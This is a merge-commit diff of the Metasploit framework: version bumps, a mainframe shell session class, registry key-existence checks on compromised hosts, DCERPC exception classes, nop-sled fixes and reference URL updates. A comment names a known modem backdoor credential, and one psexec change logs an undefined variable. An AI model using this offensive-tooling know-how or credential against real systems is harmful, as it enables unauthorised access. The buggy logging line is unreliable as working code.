Merge branch 'upstream-master' into land-6120-python-stageless
This commit is contained in:
commit
be23da1c1f
18
Gemfile.lock
18
Gemfile.lock
|
@ -1,7 +1,7 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.11.4)
|
||||
metasploit-framework (4.11.5)
|
||||
actionpack (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
bcrypt
|
||||
|
@ -21,14 +21,14 @@ PATH
|
|||
rubyzip (~> 1.1)
|
||||
sqlite3
|
||||
tzinfo
|
||||
metasploit-framework-db (4.11.4)
|
||||
metasploit-framework-db (4.11.5)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
metasploit-credential (= 1.0.1)
|
||||
metasploit-framework (= 4.11.4)
|
||||
metasploit_data_models (= 1.2.7)
|
||||
metasploit-framework (= 4.11.5)
|
||||
metasploit_data_models (= 1.2.9)
|
||||
pg (>= 0.11)
|
||||
metasploit-framework-pcap (4.11.4)
|
||||
metasploit-framework (= 4.11.4)
|
||||
metasploit-framework-pcap (4.11.5)
|
||||
metasploit-framework (= 4.11.5)
|
||||
network_interface (~> 0.0.1)
|
||||
pcaprub
|
||||
|
||||
|
@ -126,7 +126,7 @@ GEM
|
|||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
railties (>= 4.0.9, < 4.1.0)
|
||||
metasploit-payloads (1.0.15)
|
||||
metasploit_data_models (1.2.7)
|
||||
metasploit_data_models (1.2.9)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
arel-helpers
|
||||
|
@ -140,7 +140,7 @@ GEM
|
|||
mime-types (2.6.1)
|
||||
mini_portile (0.6.2)
|
||||
minitest (4.7.5)
|
||||
msgpack (0.6.2)
|
||||
msgpack (0.7.0)
|
||||
multi_json (1.11.2)
|
||||
multi_test (0.1.2)
|
||||
network_interface (0.0.1)
|
||||
|
@ -221,7 +221,7 @@ GEM
|
|||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
sprockets (>= 2.8, < 4.0)
|
||||
sqlite3 (1.3.10)
|
||||
sqlite3 (1.3.11)
|
||||
thor (0.19.1)
|
||||
thread_safe (0.3.5)
|
||||
tilt (1.4.1)
|
||||
|
|
|
@ -32,7 +32,7 @@ module Metasploit
|
|||
|
||||
MAJOR = 4
|
||||
MINOR = 11
|
||||
PATCH = 4
|
||||
PATCH = 5
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
end
|
||||
|
|
|
@ -638,13 +638,10 @@ class ReadableText
|
|||
# @param col [Integer] the column wrap width.
|
||||
# @return [String] the formatted list of running jobs.
|
||||
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||
columns = [ 'Id', 'Name' ]
|
||||
columns = [ 'Id', 'Name', "Payload", "LPORT" ]
|
||||
|
||||
if (verbose)
|
||||
columns << "Payload"
|
||||
columns << "LPORT"
|
||||
columns << "URIPATH"
|
||||
columns << "Start Time"
|
||||
columns += [ "URIPATH", "Start Time" ]
|
||||
end
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
|
@ -653,16 +650,19 @@ class ReadableText
|
|||
'Columns' => columns
|
||||
)
|
||||
|
||||
|
||||
# jobs are stored as a hash with the keys being a numeric job_id.
|
||||
framework.jobs.keys.sort{|a,b| a.to_i <=> b.to_i }.each { |k|
|
||||
# Job context is stored as an Array with the 0th element being
|
||||
# the running module. If that module is an exploit, ctx will also
|
||||
# contain its payload.
|
||||
ctx = framework.jobs[k].ctx
|
||||
row = [ k, framework.jobs[k].name ]
|
||||
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
|
||||
row << (ctx[0].datastore['LPORT'] || "")
|
||||
|
||||
if (verbose)
|
||||
ctx = framework.jobs[k].ctx
|
||||
uripath = ctx[0].get_resource if ctx[0].respond_to?(:get_resource)
|
||||
uripath = ctx[0].datastore['URIPATH'] if uripath.nil?
|
||||
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
|
||||
row << (ctx[0].datastore['LPORT'] || "")
|
||||
row << (uripath || "")
|
||||
row << (framework.jobs[k].start_time || "")
|
||||
end
|
||||
|
|
|
@ -0,0 +1,149 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/base/sessions/command_shell'
|
||||
|
||||
module Msf::Sessions
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides basic interaction with a Unix Systems Service
|
||||
# command shell on a mainframe (IBM System Z) running Z/OS
|
||||
# This session is initialized with a stream that will be used
|
||||
# as the pipe for reading and writing the command shell.
|
||||
#
|
||||
# Date: Oct 8, 2015
|
||||
# Author: Bigendian Smalls
|
||||
#
|
||||
###
|
||||
class MainframeShell < Msf::Sessions::CommandShell
|
||||
|
||||
#
|
||||
# This interface supports basic interaction.
|
||||
#
|
||||
include Msf::Session::Basic
|
||||
|
||||
#
|
||||
# This interface supports interacting with a single command shell.
|
||||
#
|
||||
include Msf::Session::Provider::SingleCommandShell
|
||||
|
||||
##
|
||||
#
|
||||
# initialize as mf shell session
|
||||
#
|
||||
def initialize(*args)
|
||||
self.platform = "mainframe"
|
||||
self.arch = "zarch"
|
||||
self.translate_1047 = true
|
||||
super
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# Returns the session description.
|
||||
#
|
||||
def desc
|
||||
"Mainframe shell"
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# override shell_read to include decode of cp1047
|
||||
#
|
||||
def shell_read(length=-1, timeout=1)
|
||||
#mfimpl
|
||||
if self.respond_to?(:ring)
|
||||
return Rex::Text.from_ibm1047(shell_read_ring(length,timeout))
|
||||
end
|
||||
|
||||
begin
|
||||
rv = Rex::Text.from_ibm1047(rstream.get_once(length, timeout))
|
||||
framework.events.on_session_output(self, rv) if rv
|
||||
return rv
|
||||
rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
|
||||
shell_close
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# override shell_write to include encode of cp1047
|
||||
#
|
||||
def shell_write(buf)
|
||||
#mfimpl
|
||||
return unless buf
|
||||
|
||||
begin
|
||||
framework.events.on_session_command(self, buf.strip)
|
||||
rstream.write(Rex::Text.to_ibm1047(buf))
|
||||
rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
|
||||
shell_close
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
def execute_file(full_path, args)
|
||||
#mfimpl
|
||||
raise NotImplementedError
|
||||
end
|
||||
|
||||
# need to do more testing on this before we either use the default in command_shell
|
||||
# or write a new one. For now we just make it unavailble. This prevents a hang on
|
||||
# initial session creation. See PR#6067
|
||||
undef_method :process_autoruns
|
||||
|
||||
def desc
|
||||
"Mainframe USS session"
|
||||
end
|
||||
|
||||
attr_accessor :translate_1047 # tells the session whether or not to translate
|
||||
# ebcdic (cp1047) <-> ASCII for certain mainframe payloads
|
||||
# this will be used in post modules to be able to switch on/off the
|
||||
# translation on file transfers, for instance
|
||||
|
||||
protected
|
||||
|
||||
##
|
||||
#
|
||||
# _interact_ring overridden to include decoding of cp1047 data
|
||||
#
|
||||
def _interact_ring
|
||||
begin
|
||||
rdr = framework.threads.spawn("RingMonitor", false) do
|
||||
seq = nil
|
||||
|
||||
while self.interacting
|
||||
# Look for any pending data from the remote ring
|
||||
nseq,data = ring.read_data(seq)
|
||||
|
||||
# Update the sequence number if necessary
|
||||
seq = nseq || seq
|
||||
|
||||
# Write output to the local stream if successful
|
||||
user_output.print(Rex::Text.from_ibm1047(data)) if data
|
||||
|
||||
begin
|
||||
# Wait for new data to arrive on this session
|
||||
ring.wait(seq)
|
||||
rescue EOFError => e
|
||||
print_error("EOFError: #{e.class}: #{e}")
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
while self.interacting
|
||||
# Look for any pending input or errors from the local stream
|
||||
sd = Rex::ThreadSafe.select([ _local_fd ], nil, [_local_fd], 5.0)
|
||||
|
||||
# Write input to the ring's input mechanism
|
||||
shell_write(user_input.gets) if sd
|
||||
end
|
||||
ensure
|
||||
rdr.kill
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -342,14 +342,18 @@ class EncodedPayload
|
|||
self.nop_sled = nop.generate_sled(self.nop_sled_size,
|
||||
'BadChars' => reqs['BadChars'],
|
||||
'SaveRegisters' => save_regs)
|
||||
|
||||
if nop_sled && nop_sled.length == nop_sled_size
|
||||
break
|
||||
else
|
||||
dlog("#{pinst.refname}: Nop generator #{nop.refname} failed to generate sled for payload", 'core', LEV_1)
|
||||
end
|
||||
rescue
|
||||
dlog("#{pinst.refname}: Nop generator #{nop.refname} failed to generate sled for payload: #{$!}",
|
||||
'core', LEV_1)
|
||||
|
||||
self.nop = nil
|
||||
end
|
||||
|
||||
break
|
||||
}
|
||||
|
||||
if (self.nop_sled == nil)
|
||||
|
|
|
@ -1034,12 +1034,16 @@ class Exploit < Msf::Module
|
|||
nop_sled = nop.generate_sled(count,
|
||||
'BadChars' => payload_badchars || '',
|
||||
'SaveRegisters' => save_regs)
|
||||
|
||||
if nop_sled && nop_sled.length == count
|
||||
break
|
||||
else
|
||||
wlog("#{self.refname}: Nop generator #{nop.refname} failed to generate sled for exploit", 'core', LEV_0)
|
||||
end
|
||||
rescue
|
||||
wlog("#{self.refname}: Nop generator #{nop.refname} failed to generate sled for exploit: #{$!}",
|
||||
'core', LEV_0)
|
||||
end
|
||||
|
||||
break
|
||||
}
|
||||
|
||||
nop_sled
|
||||
|
|
|
@ -145,6 +145,19 @@ module Registry
|
|||
end
|
||||
end
|
||||
|
||||
# Checks if a key exists on the target registry
|
||||
#
|
||||
# @param key [String] the full path of the key to check
|
||||
# @return [Boolean] true if the key exists on the target registry, false otherwise
|
||||
# (also in case of error)
|
||||
def registry_key_exist?(key)
|
||||
if session_has_registry_ext
|
||||
meterpreter_registry_key_exist?(key)
|
||||
else
|
||||
shell_registry_key_exist?(key)
|
||||
end
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
|
@ -310,6 +323,26 @@ protected
|
|||
shell_registry_cmd_result("add /f \"#{key}\" /v \"#{valname}\" /t \"#{type}\" /d \"#{data}\" /f", view)
|
||||
end
|
||||
|
||||
# Checks if a key exists on the target registry using a shell session
|
||||
#
|
||||
# @param key [String] the full path of the key to check
|
||||
# @return [Boolean] true if the key exists on the target registry, false otherwise,
|
||||
# even if case of error (invalid arguments) or the session hasn't permission to
|
||||
# access the key
|
||||
def shell_registry_key_exist?(key)
|
||||
begin
|
||||
key = normalize_key(key)
|
||||
rescue ArgumentError
|
||||
return false
|
||||
end
|
||||
|
||||
results = shell_registry_cmd("query \"#{key}\"")
|
||||
if results =~ /ERROR: /i
|
||||
return false
|
||||
else
|
||||
return true
|
||||
end
|
||||
end
|
||||
|
||||
##
|
||||
# Meterpreter-specific registry manipulation methods
|
||||
|
@ -515,6 +548,27 @@ protected
|
|||
end
|
||||
end
|
||||
|
||||
# Checks if a key exists on the target registry using a meterpreter session
|
||||
#
|
||||
# @param key [String] the full path of the key to check
|
||||
# @return [Boolean] true if the key exists on the target registry, false otherwise
|
||||
# (also in case of error)
|
||||
def meterpreter_registry_key_exist?(key)
|
||||
begin
|
||||
root_key, base_key = session.sys.registry.splitkey(key)
|
||||
rescue ArgumentError
|
||||
return false
|
||||
end
|
||||
|
||||
begin
|
||||
check = session.sys.registry.check_key_exists(root_key, base_key)
|
||||
rescue Rex::Post::Meterpreter::RequestError, TimesoutError
|
||||
return false
|
||||
end
|
||||
|
||||
check
|
||||
end
|
||||
|
||||
#
|
||||
# Normalize the supplied full registry key string so the root key is sane. For
|
||||
# instance, passing "HKLM\Software\Dog" will return 'HKEY_LOCAL_MACHINE\Software\Dog'
|
||||
|
|
|
@ -481,15 +481,17 @@ private
|
|||
def _valid_session(sid,type)
|
||||
|
||||
s = self.framework.sessions[sid.to_i]
|
||||
|
||||
if(not s)
|
||||
error(500, "Unknown Session ID")
|
||||
error(500, "Unknown Session ID #{sid}")
|
||||
end
|
||||
|
||||
if type == "ring"
|
||||
if not s.respond_to?(:ring)
|
||||
error(500, "Session #{s.type} does not support ring operations")
|
||||
end
|
||||
elsif (s.type != type)
|
||||
elsif (type == 'meterpreter' && s.type != type) ||
|
||||
(type == 'shell' && s.type == 'meterpreter')
|
||||
error(500, "Session is not of type " + type)
|
||||
end
|
||||
s
|
||||
|
|
|
@ -77,6 +77,22 @@ class Registry
|
|||
client, root_key, base_key, perm, response.get_tlv(TLV_TYPE_HKEY).value)
|
||||
end
|
||||
|
||||
# Checks if a key exists on the target registry
|
||||
#
|
||||
# @param root_key [String] the root part of the key path. Ex: HKEY_LOCAL_MACHINE
|
||||
# @param base_key [String] the base part of the key path
|
||||
# @return [Boolean] true if the key exists on the target registry, false otherwise, even
|
||||
# it the session hasn't permissions to access the target key.
|
||||
# @raise [TimeoutError] if the timeout expires when waiting the answer
|
||||
# @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid
|
||||
def Registry.check_key_exists(root_key, base_key)
|
||||
request = Packet.create_request('stdapi_registry_check_key_exists')
|
||||
request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
|
||||
request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
|
||||
response = client.send_request(request)
|
||||
return response.get_tlv(TLV_TYPE_BOOL).value
|
||||
end
|
||||
|
||||
#
|
||||
# Opens the supplied registry key on the specified remote host. Requires that the
|
||||
# current process has credentials to access the target and that the target has the
|
||||
|
|
|
@ -57,7 +57,7 @@ require 'rex/proto/smb/exceptions'
|
|||
case self.handle.protocol
|
||||
when 'ncacn_ip_tcp'
|
||||
if self.socket.type? != 'tcp'
|
||||
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
|
||||
end
|
||||
when 'ncacn_np'
|
||||
if self.socket.class == Rex::Proto::SMB::SimpleClient::OpenPipe
|
||||
|
@ -65,11 +65,11 @@ require 'rex/proto/smb/exceptions'
|
|||
elsif self.socket.type? == 'tcp'
|
||||
self.smb_connect()
|
||||
else
|
||||
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
|
||||
end
|
||||
# No support ncacn_ip_udp (is it needed now that its ripped from Vista?)
|
||||
else
|
||||
raise "Unsupported protocol : #{self.handle.protocol}"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "Unsupported protocol : #{self.handle.protocol}"
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -255,7 +255,7 @@ require 'rex/proto/smb/exceptions'
|
|||
bind, context = Rex::Proto::DCERPC::Packet.make_bind(*self.handle.uuid)
|
||||
end
|
||||
|
||||
raise 'make_bind failed' if !bind
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::BindError, 'make_bind failed' if !bind
|
||||
|
||||
self.write(bind)
|
||||
raw_response = self.read()
|
||||
|
@ -264,11 +264,11 @@ require 'rex/proto/smb/exceptions'
|
|||
self.last_response = response
|
||||
if response.type == 12 or response.type == 15
|
||||
if self.last_response.ack_result[context] == 2
|
||||
raise "Could not bind to #{self.handle}"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
|
||||
end
|
||||
self.context = context
|
||||
else
|
||||
raise "Could not bind to #{self.handle}"
|
||||
raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -132,6 +132,32 @@ class NoResponse < Error
|
|||
end
|
||||
end
|
||||
|
||||
class BindError < Error
|
||||
def initialize(message=nil)
|
||||
@message = message
|
||||
end
|
||||
|
||||
def to_s
|
||||
str = 'Failed to bind.'
|
||||
if @message
|
||||
str += " #{@message}"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
class InvalidSocket < Error
|
||||
def initialize(message=nil)
|
||||
@message = message
|
||||
end
|
||||
|
||||
def to_s
|
||||
str = 'Invalid Socket.'
|
||||
if @message
|
||||
str += " #{@message}"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
class InvalidPacket < Error
|
||||
def initialize(message = nil)
|
||||
@message = message
|
||||
|
|
|
@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
|
|||
# Metasploit::Credential database models
|
||||
spec.add_runtime_dependency 'metasploit-credential', '1.0.1'
|
||||
# Database models shared between framework and Pro.
|
||||
spec.add_runtime_dependency 'metasploit_data_models', '1.2.7'
|
||||
spec.add_runtime_dependency 'metasploit_data_models', '1.2.9'
|
||||
# depend on metasploit-framewrok as the optional gems are useless with the actual code
|
||||
spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
|
||||
# Needed for module caching in Mdm::ModuleDetails
|
||||
|
|
|
@ -28,9 +28,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'BID', '19680' ],
|
||||
[ 'CVE', '2006-4313' ],
|
||||
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml' ],
|
||||
[ 'OSVDB', '28139' ],
|
||||
[ 'OSVDB', '28138' ],
|
||||
[ 'OSVDB', '28138' ]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 23 2006'))
|
||||
|
||||
|
|
|
@ -33,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2011-0923' ],
|
||||
[ 'OSVDB', '72526' ],
|
||||
[ 'ZDI', '11-055' ],
|
||||
[ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html' ],
|
||||
[ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux' ]
|
||||
],
|
||||
'Author' =>
|
||||
|
|
|
@ -46,8 +46,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' => [
|
||||
[ 'CVE', '2015-0964' ], # XSS vulnerability
|
||||
[ 'CVE', '2015-0965' ], # CSRF vulnerability
|
||||
[ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
|
||||
[ 'URL', 'https://community.rapid7.com/rapid7_blogpostdetail?id=a111400000AanBs' ] # Original disclosure
|
||||
[ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
|
||||
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems' ],
|
||||
]
|
||||
))
|
||||
|
||||
|
|
|
@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'EDB', '25252' ],
|
||||
[ 'OSVDB', '93013' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ],
|
||||
[ 'URL', 'http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ]
|
||||
],
|
||||
'Author' => [
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>'
|
||||
|
|
|
@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'OSVDB', '89912' ],
|
||||
[ 'BID', '57760' ],
|
||||
[ 'EDB', '24475' ],
|
||||
[ 'URL', 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
|
||||
],
|
||||
'DisclosureDate' => 'Feb 05 2013'))
|
||||
|
|
|
@ -29,7 +29,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
|
||||
[ 'EDB', '24202' ],
|
||||
|
|
|
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2014-7862'],
|
||||
['OSVDB', '116554'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt'],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 31 2014'))
|
||||
|
||||
|
|
|
@ -36,8 +36,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2014-7863'],
|
||||
['OSVDB', '117696'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
|
||||
],
|
||||
'DisclosureDate' => 'Jan 28 2015'))
|
||||
|
||||
|
|
|
@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2014-7863'],
|
||||
['OSVDB', '117695'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
|
||||
],
|
||||
'DisclosureDate' => 'Jan 28 2015'))
|
||||
|
||||
|
|
|
@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2014-8499' ],
|
||||
[ 'OSVDB', '114485' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ]
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ],
|
||||
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt' ],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 8 2014'))
|
||||
|
||||
|
|
|
@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2014-5445' ],
|
||||
[ 'OSVDB', '115340' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ]
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ],
|
||||
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]
|
||||
],
|
||||
'DisclosureDate' => 'Nov 30 2014'))
|
||||
|
||||
|
|
|
@ -29,9 +29,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ],
|
||||
# Fill this in with the direct advisory URL from Infigo
|
||||
[ 'URL', 'http://www.infigo.hr/in_focus/advisories/' ]
|
||||
[ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'SSL' => true
|
||||
|
|
|
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-2993' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ],
|
||||
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 3 2015'))
|
||||
|
||||
|
|
|
@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2015-2996'],
|
||||
['CVE', '2015-2997'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt'],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 3 2015'))
|
||||
|
||||
|
|
|
@ -29,8 +29,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2015-2996'],
|
||||
['CVE', '2015-2998'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'],
|
||||
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt']
|
||||
],
|
||||
'DisclosureDate' => 'Jun 3 2015'))
|
||||
|
||||
|
|
|
@ -21,11 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
as well as read privileges to the target file.
|
||||
},
|
||||
'Author' => [ 'todb' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ]
|
||||
]
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
|
|
@ -99,7 +99,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("#{peer} - Executing the command...")
|
||||
begin
|
||||
return psexec(execute)
|
||||
rescue Rex::Proto::SMB::Exceptions::Error => exec_command_error
|
||||
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => exec_command_error
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
|
||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
return false
|
||||
end
|
||||
|
|
|
@ -34,8 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['CVE', '2003-0027'],
|
||||
['OSVDB', '8201'],
|
||||
['BID', '6665'],
|
||||
['URL', 'http://marc.info/?l=bugtraq&m=104326556329850&w=2'],
|
||||
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
|
||||
['URL', 'http://marc.info/?l=bugtraq&m=104326556329850&w=2']
|
||||
],
|
||||
# Tested OK against sol8.tor 20100624 -jjd
|
||||
'DisclosureDate' => 'Jan 22 2003')
|
||||
|
|
|
@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://github.com/claudijd/BNAT-Suite'],
|
||||
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
|
||||
[ 'URL', 'https://github.com/claudijd/bnat' ],
|
||||
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels']
|
||||
]
|
||||
)
|
||||
register_options(
|
||||
|
|
|
@ -25,8 +25,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://github.com/claudijd/BNAT-Suite'],
|
||||
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
|
||||
[ 'URL', 'https://github.com/claudijd/bnat'],
|
||||
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels']
|
||||
]
|
||||
)
|
||||
|
||||
|
|
|
@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'BID', '1154'],
|
||||
[ 'CVE', '2000-0380'],
|
||||
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20000514-ios-http-server.shtml'],
|
||||
[ 'OSVDB', '1302' ],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 26 2000'))
|
||||
|
|
|
@ -30,8 +30,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'References' => [
|
||||
['CVE', '2015-5477'],
|
||||
['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
|
||||
